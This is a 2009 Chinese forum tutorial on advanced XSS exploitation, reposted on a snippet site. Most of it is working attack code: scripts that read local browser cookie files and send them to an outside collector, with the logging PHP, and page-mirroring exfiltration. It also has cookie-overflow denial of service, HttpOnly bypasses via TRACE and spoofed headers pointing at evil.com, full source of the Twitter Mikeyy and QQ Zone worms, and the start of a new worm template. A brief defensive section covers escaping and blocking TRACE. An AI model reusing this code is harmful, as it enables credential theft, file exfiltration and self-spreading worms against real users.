首页 > 代码库 > XSS的高级利用部分总结 -蠕虫

XSS的高级利用部分总结 -蠕虫

XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
本帖最后由 racle 于 2009-5-30 09:19 编辑

XSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
By racle@tian6.com    
http://bbs.tian6.com/thread-12711-1-1.html
转帖请保留版权



-------------------------------------------前言---------------------------------------------------------


本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.


如果你还未具备基础XSS知识,以下几个文章建议拜读:
http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
http://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
http://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
http://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
http://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
http://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持




如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.

希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.

如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,

Baidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大

QQ ZONE,校内网XSS     感染过万QQ ZONE.

OWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪

..........
复制代码------------------------------------------介绍-------------------------------------------------------------

什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.



跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.



如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
我们在这里重点探讨以下几个问题:

1        通过XSS,我们能实现什么?

2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?

3        XSS的高级利用和高级综合型XSS蠕虫的可行性?

4        XSS漏洞在输出和输入两个方面怎么才能避免.



------------------------------------------研究正题----------------------------------------------------------



通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
4:Http-only可以采用作为COOKIES保护方式之一.





(I) AJAX在不同的浏览器下的本地文件操作权限:(读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)

我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的,看来MS对IE这类安全风险比较重视。(这有一些问题,随后修正!)



    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。



    3: opera9.64及以下版本允许通过指定url为file://协议进行访问;如果文件在当前目录下,则不需要指定file://协议;如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。



    4: 基于webkit内核:google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
复制代码IE6使用ajax读取本地文件    <script>

    function $(x){return document.getElementById(x)}



    function ajax_obj(){

    var request = false;

    if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {

    var versions = [‘Microsoft.XMLHTTP‘, ‘MSXML.XMLHTTP‘, ‘Microsoft.XMLHTTP‘, ‘Msxml2.XMLHTTP.7.0‘, ‘Msxml2.XMLHTTP.6.0‘, ‘Msxml2.XMLHTTP.5.0‘,



    ‘Msxml2.XMLHTTP.4.0‘, ‘MSXML2.XMLHTTP.3.0‘, ‘MSXML2.XMLHTTP‘];

    for(var i=0; i<versions.length; i++) {

    try {

    request = new ActiveXObject(versions[i]);

    } catch(e) {}

    }

    }

    return request;

    }

    var _x = ajax_obj();

    function _7or3(_m,action,argv){

    _x.open(_m,action,false);

    if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    _x.send(argv);

    return _x.responseText;

    }



    var txt=_7or3("GET","file://localhost/C:/11.txt",null);

    alert(txt);



    </script>
复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>

    function $(x){return document.getElementById(x)}



    function ajax_obj(){

    var request = false;

    if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

    } else if(window.ActiveXObject) {

    var versions = [‘Microsoft.XMLHTTP‘, ‘MSXML.XMLHTTP‘, ‘Microsoft.XMLHTTP‘, ‘Msxml2.XMLHTTP.7.0‘, ‘Msxml2.XMLHTTP.6.0‘, ‘Msxml2.XMLHTTP.5.0‘,



    ‘Msxml2.XMLHTTP.4.0‘, ‘MSXML2.XMLHTTP.3.0‘, ‘MSXML2.XMLHTTP‘];

    for(var i=0; i<versions.length; i++) {

    try {

    request = new ActiveXObject(versions[i]);

    } catch(e) {}

    }

    }

    return request;

    }

    var _x = ajax_obj();

    function _7or3(_m,action,argv){

    _x.open(_m,action,false);

    if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    _x.send(argv);

    return _x.responseText;

    }



    var txt=_7or3("GET","1/11.txt",null);

    alert(txt);



    </script>
复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”



Chrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"



<?   

/*  

     Chrome 1.0.154.53 use ajax read local txt file and upload exp  

     www.inbreak.net   

     author voidloafer@gmail.com 2009-4-22    

     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  

*/  

header("Content-Disposition: attachment;filename=kxlzx.htm");   

header("Content-type: application/kxlzx");   

/*  

     set header, so just download html file,and open it at local.  

*/  

?>   

<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="POST">   

     <input id="input" name="cookie" value="" type="hidden">   

</form>   

<script>   

function doMyAjax(user)   

{   

var time = Math.random();   

/*  

the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  

and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  

and so on...  

*/  

var strPer = ‘file://localhost/C:/Documents and Settings/‘+user+‘/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time=‘+time;   

    

startRequest(strPer);   



}   

   

function Enshellcode(txt)   

{   

var url=new String(txt);   

var i=0,l=0,k=0,curl="";   

l= url.length;   

for(;i<l;i++){   

k=url.charCodeAt(i);   

if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   

if (l%2){curl+="00";}else{curl+="0000";}   

curl=curl.replace(/(..)(..)/g,"%u$2$1");   

return curl;   

}   

   

   

var xmlHttp;   

function createXMLHttp(){   

     if(window.XMLHttpRequest){   

xmlHttp = new XMLHttpRequest();           

     }   

     else if(window.ActiveXObject){   

xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   

     }   

}   

   

function startRequest(doUrl){   

    

     createXMLHttp();   



     xmlHttp.onreadystatechange = handleStateChange;   



     xmlHttp.open("GET", doUrl, true);   



     xmlHttp.send(null);   





}    

   

function handleStateChange(){   

     if (xmlHttp.readyState == 4 ){   

     var strResponse = "";   

     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);    

        

     }   

}   

   

   

function framekxlzxPost(text)   

{   

     document.getElementById("input").value = http://www.mamicode.com/Enshellcode(text);

     document.getElementById("form").submit();   

}   

   

doMyAjax("administrator");   

   

</script>
复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  

var xmlHttp;  

function createXMLHttp(){  

     if(window.XMLHttpRequest){  

         xmlHttp = new XMLHttpRequest();          

     }  

     else if(window.ActiveXObject){  

         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  

     }  

}  

   

function startRequest(doUrl){  

           

     createXMLHttp();  

       

     xmlHttp.onreadystatechange = handleStateChange;  

       

     xmlHttp.open("GET", doUrl, true);  

       

     xmlHttp.send(null);  

       

       

}   

   

function handleStateChange(){  

     if (xmlHttp.readyState == 4 ){  

             var strResponse = "";  

             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   

               

     }  

}  

   

function doMyAjax(user,file)  

{  

         var time = Math.random();  

           

         var strPer = ‘file://localhost/C:/Documents%20and%20Settings/‘+user+‘/Cookies/‘+file+‘?time=‘+time;  

           

         startRequest(strPer);  

       

}  

   

function framekxlzxPost(text)  

{  

     document.getElementById(‘framekxlzx‘).src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  

     alert(/ok/);  

}  

   

doMyAjax(‘administrator‘,‘administrator@alibaba[1].txt‘);  

   

</script>





a.php



<?php      

   

$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  

$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   

 

$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     

fwrite($fp,$_GET["cookie"]);      

fclose($fp);    

?>
复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:

或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.

代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);

//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);

//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);

function getURL(s) {

var image = new Image();

image.style.width = 0;

image.style.height = 0;

image.src = http://www.mamicode.com/s;

}

getURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
这里引用大风的一段简单代码:<script language="javascript">

var metastr = "AAAAAAAAAA"; // 10 A

var str = "";

while (str.length < 4000){

    str += metastr;

}



document.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS

</script>

详细代码请看:http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
server limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150

假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.






(III) Http only bypass 与 补救对策:

什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性,用以阻止客户端脚本访问Cookie.
以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">

<!--

function normalCookie() {

document.cookie = "TheCookieName=CookieValue_httpOnly";

alert(document.cookie);

}





function httpOnlyCookie() {

document.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";

alert(document.cookie);}



//-->

</script>



<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE=http://www.mamicode.com/‘Display Normal Cookie‘>

<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE=http://www.mamicode.com/‘Display HTTPONLY Cookie‘>
复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>



var request = false;

        if(window.XMLHttpRequest) {

            request = new XMLHttpRequest();

            if(request.overrideMimeType) {

                request.overrideMimeType(‘text/xml‘);

            }

        } else if(window.ActiveXObject) {

            var versions = [‘Microsoft.XMLHTTP‘, ‘MSXML.XMLHTTP‘, ‘Microsoft.XMLHTTP‘, ‘Msxml2.XMLHTTP.7.0‘,‘Msxml2.XMLHTTP.6.0‘,‘Msxml2.XMLHTTP.5.0‘, ‘Msxml2.XMLHTTP.4.0‘, ‘MSXML2.XMLHTTP.3.0‘, ‘MSXML2.XMLHTTP‘];

            for(var i=0; i<versions.length; i++) {

                try {

                    request = new ActiveXObject(versions[i]);

                } catch(e) {}

            }

        }

xmlHttp=request;

xmlHttp.open("TRACE","http://www.vul.com",false);

xmlHttp.send(null);

xmlDoc=xmlHttp.responseText;

alert(xmlDoc);

</script>
复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

XmlHttp.send(null);

var resource=xmlHttp.responseText

resource.search(/cookies/);

......................

</script>





如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求

[code]

RewriteEngine On

RewriteCond %{REQUEST_METHOD} ^TRACE

RewriteRule .* - [F]



Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求

acl TRACE method TRACE

...

http_access deny TRACE
复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

XmlHttp.send(null);

</script>
复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");



XmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);

XmlHttp.send(null);

<script>
复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
复制代码案例:Twitter 蠕蟲五度發威
第一版:
  下载 (5.1 KB)

6 天前 08:27

第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "‘", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  

   2.    

   3. function XHConn(){  

   4.   var _0x6687x2,_0x6687x3=false;  

   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  

   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  

   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  

   8.   catch(e) { _0x6687x2=false; }; }; };  
复制代码第六版:   1. function wait() {  

   2.   var content = document.documentElement.innerHTML;  

   3.   var tmp_cookie=document.cookie;  

   4.   var tmp_posted=tmp_cookie.match(/posted/);  

   5.   authreg= new RegExp(/twttr.form_authenticity_token = ‘(.*)‘;/g);  

   6.   var authtoken=authreg.exec(content);  

   7.   var authtoken=authtoken[1];  

   8.   var randomUpdate= new Array();  

   9.   randomUpdate[0]= "Be nice to your kids. They‘ll choose your nursing home. Womp. mikeyy.";  

  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  

  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  

  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  

  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  

  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it‘s your stupidity. Womp. mikeyy.";  

  15.   randomUpdate[6]= "Money is not the only thing, it‘s everything. Womp. mikeyy.";  

  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

  17.   randomUpdate[8]= "‘Your future depends on your dreams‘, So go to sleep. Womp. mikeyy.";  

  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  

  19.   randomUpdate[10]= "‘Work fascinates me‘ I can look at it for hours ! Womp. mikeyy.";  

  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  

  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm http://bit.ly/XvuJe";  

  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  

  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  

  24.     

  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  

  26.   var updateEncode=urlencode(randomUpdate[genRand]);  

  27.     

  28.   var ajaxConn= new XHConn();  

  29.   ajaxConn.connect("/status/update","POST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

  30.   var _0xf81bx1c="Mikeyy";  

  31.   var updateEncode=urlencode(_0xf81bx1c);  

  32.   var ajaxConn1= new XHConn();  

  33.   ajaxConn1.connect("/account/settings","POST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  

  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement(‘script‘)).src=http://www.mamicode.com/‘http://runebash.net/xss.js‘);) #test { color:#333333";  

  35.   var XSS=urlencode(genXSS);  

  36.   var ajaxConn2= new XHConn();  

  37.   ajaxConn2.connect("/account/profile_settings",""POST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  

  38.     

  39. } ;  

  40. setTimeout(wait(),5250);  
复制代码QQ空间XSSfunction killErrors() {return true;}

window.onerror=killErrors;



var shendu;shendu=4;

//---------------global---v------------------------------------------

//通过indexOf函数得到URL中相应的字符串,用于判断是否登录的吧?

var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";

var myblogurl=new Array();var myblogid=new Array();

        var gurl=document.location.href;

        var gurle=gurl.indexOf("com/");

        gurl=gurl.substring(0,gurle+3);        

        var visitorID=top.document.documentElement.outerHTML;

           var cookieS=visitorID.indexOf("g_iLoginUin = ");

        visitorID=visitorID.substring(cookieS+14);

        cookieS=visitorID.indexOf(",");

        visitorID=visitorID.substring(0,cookieS);

        get_my_blog(visitorID);

        DOshuamy();



//挂马

function DOshuamy(){

var ssr=document.getElementById("veryTitle");

ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src=http://www.mamicode.com/‘http://www.xxx.com/1.html‘></iframe>");

}



//如果创建XMLHttpRequest成功就跳到指定的URL去,这个URL是干什么的就不知道了,没看过,刷人气?

function get_my_blog(visitorID){

   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";

   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象

   if(xhr){    //成功就执行下面的

     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL

     xhr.send();guest=xhr.responseText;

     get_my_blogurl(guest);    //执行这个函数

    }

}



//这里似乎是判断没有登录的

function get_my_blogurl(guest){

  var mybloglist=guest;

  var myurls;var blogids;var blogide;

  for(i=0;i<shendu;i++){

     myurls=mybloglist.indexOf(‘selectBlog(‘);    //查找URL中"selectBlog"字符串,干什么的就不知道了

     if(myurls!=-1){    //找到了就执行下面的

         mybloglist=mybloglist.substring(myurls+11);

         myurls=mybloglist.indexOf(‘)‘);

         myblogid[i]=mybloglist.substring(0,myurls);

        }else{break;}

}

get_my_testself();    //执行这个函数

}



//这里往哪跳就不知道了

function get_my_testself(){

  for(i=0;i<myblogid.length;i++){    //获得blogid的值

      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid[i]+"&r="+Math.random();

      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象

      if(xhr2){        //如果成功

              xhr2.open("GET",url,false);     //打开上面的那个url

              xhr2.send();

              guest2=xhr2.responseText;

              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串,找它做什么?

              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串

              if(mycheckmydoit!="-1"){    //返回-1则代表没找到

                targetblogurlid=myblogid[i];    

                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它

                break;

               }

              if(mycheckit=="-1"){

                targetblogurlid=myblogid[i];

                add_js(visitorID,targetblogurlid,gurl);    //执行它

                break;

               }

        }      

}

}



//--------------------------------------  

//根据浏览器创建一个XMLHttpRequest对象

function createXMLHttpRequest(){

    var XMLhttpObject=null;  

    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  

    else  

      { var MSXML=[‘Msxml2.XMLHTTP.7.0‘,‘Msxml2.XMLHTTP.6.0‘, ‘Msxml2.XMLHTTP.5.0‘, ‘Msxml2.XMLHTTP.4.0‘, ‘MSXML2.XMLHTTP.3.0‘, ‘MSXML2.XMLHTTP‘,‘MSXML.XMLHTTP‘, ‘MICROSOFT.XMLHTTP.1.0‘,‘MICROSOFT.XMLHTTP.1‘, ‘Microsoft.XMLHTTP‘];        

        for(var i=0;i<MSXML.length;i++)  

        {  

            try  

            {  

                XMLhttpObject=new ActiveXObject(MSXML[i]);  

                break;  

            }  

            catch (ex) {  

            }  

         }  

      }

return XMLhttpObject;

}  



//这里就是感染部分了

function add_js(visitorID,targetblogurlid,gurl){

var s2=document.createElement(‘script‘);

s2.src=http://www.mamicode.com/‘http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl=‘+gurl+‘&uin=‘+visitorID+‘&blogid=‘+targetblogurlid+"&r="+Math.random();

s2.type=‘text/javascript‘;

document.getElementsByTagName(‘head‘).item(0).appendChild(s2);

}



function add_jsdel(visitorID,targetblogurlid,gurl){

var s2=document.createElement(‘script‘);

s2.src=http://www.mamicode.com/‘http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl=‘+gurl+‘&uin=‘+visitorID+‘&blogid=‘+targetblogurlid+"&r="+Math.random();

s2.type=‘text/javascript‘;

document.getElementsByTagName(‘head‘).item(0).appendChild(s2);

}
复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)

2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)

综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~


下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.

首先,自然是判断不同浏览器,创建不同的对象var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType(‘text/xml‘);

}

} else if(window.ActiveXObject) {

var versions = [‘Microsoft.XMLHTTP‘, ‘MSXML.XMLHTTP‘, ‘Microsoft.XMLHTTP‘, ‘Msxml2.XMLHTTP.7.0‘, ‘Msxml2.XMLHTTP.6.0‘, ‘Msxml2.XMLHTTP.5.0‘, ‘Msxml2.XMLHTTP.4.0‘, ‘MSXML2.XMLHTTP.3.0‘, ‘MSXML2.XMLHTTP‘];

for(var i=0; i<versions.length; i++) {

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlHttpReq=request;
复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){

        var Browser_Name=navigator.appName;

        var Browser_Version=parseFloat(navigator.appVersion);

        var Browser_Agent=navigator.userAgent;

        

        var Actual_Version,Actual_Name;

        

        var is_IE=(Browser_Name=="Microsoft Internet Explorer");

        var is_NN=(Browser_Name=="Netscape");

        var is_Ch=(Browser_Name=="Chrome");

        

        if(is_NN){

            if(Browser_Version>=5.0){

                var Split_Sign=Browser_Agent.lastIndexOf("/");

                var Version=Browser_Agent.indexOf(" ",Split_Sign);

                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);



                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);

                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);

            }

            else{

                Actual_Version=Browser_Version;

                Actual_Name=Browser_Name;

            }

        }

        else if(is_IE){

            var Version_Start=Browser_Agent.indexOf("MSIE");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);

            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

            Actual_Name=Browser_Name;

            

            if(Browser_Agent.indexOf("Maxthon")!=-1){

                Actual_Name+="(Maxthon)";

            }

            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";

                var tempstart=Browser_Agent.indexOf("Opera");

                var tempend=Browser_Agent.length;

                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

            }

        }

        else if(is_Ch){

            var Version_Start=Browser_Agent.indexOf("Chrome");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);

            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

            Actual_Name=Browser_Name;

            

            if(Browser_Agent.indexOf("Maxthon")!=-1){

                Actual_Name+="(Maxthon)";

            }

            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";

                var tempstart=Browser_Agent.indexOf("Opera");

                var tempend=Browser_Agent.length;

                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

            }

        }

        else{

            Actual_Name="Unknown Navigator"

            Actual_Version="Unknown Version"

        }



